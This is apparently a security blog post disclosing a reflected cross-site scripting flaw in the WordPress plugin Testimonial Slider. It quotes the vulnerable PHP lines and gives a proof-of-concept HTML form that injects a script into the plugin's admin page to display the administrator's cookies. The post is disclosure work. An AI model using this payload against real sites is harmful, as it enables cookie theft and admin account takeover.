In a post earlier today we mentioned running across mention of the plugin Testimonial Slider being removed from the Plugin Directory and the cause of that. While doing a bit of checking over the plugin we found another minor vulnerability (and there certainly could be more as the code we looked at isn’t securely written), we just happened across this one while looking for something else.

On line 267 of the file /slider_versions/testimonial_1.php the value of the variable $active_tab is output without being escaped:

jQuery("#slider_tabs").tabs({fx: { opacity: "toggle", duration: 300}, active: <?php echo $active_tab;?> }).addClass( "ui-tabs-vertical-left ui-helper-clearfix" );jQuery( "#slider_tabs li" ).removeClass( "ui-corner-top" ).addClass( "ui-corner-left" );

Several lines above that the variable can be defined:

261

if ( isset($_GET['page']) && ('testimonial-slider-admin' == $_GET['page']) && isset($_POST['active_tab']) ) $active_tab=$_POST['active_tab'];

If you are request a certain of the plugin’s admin pages and send a POST input “active_tab” then the variable is set to the value of that POST input without being sanitized.

The lack of sanitization or escaping permits reflected cross-site scripting (XSS) to occur.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in alert box when logged in to WordPress as an Administrator. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=testimonial-slider-admin" method="POST">
<input type="hidden" name="active_tab" value='</script><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>

Concerned About The Security of the Plugins You Use?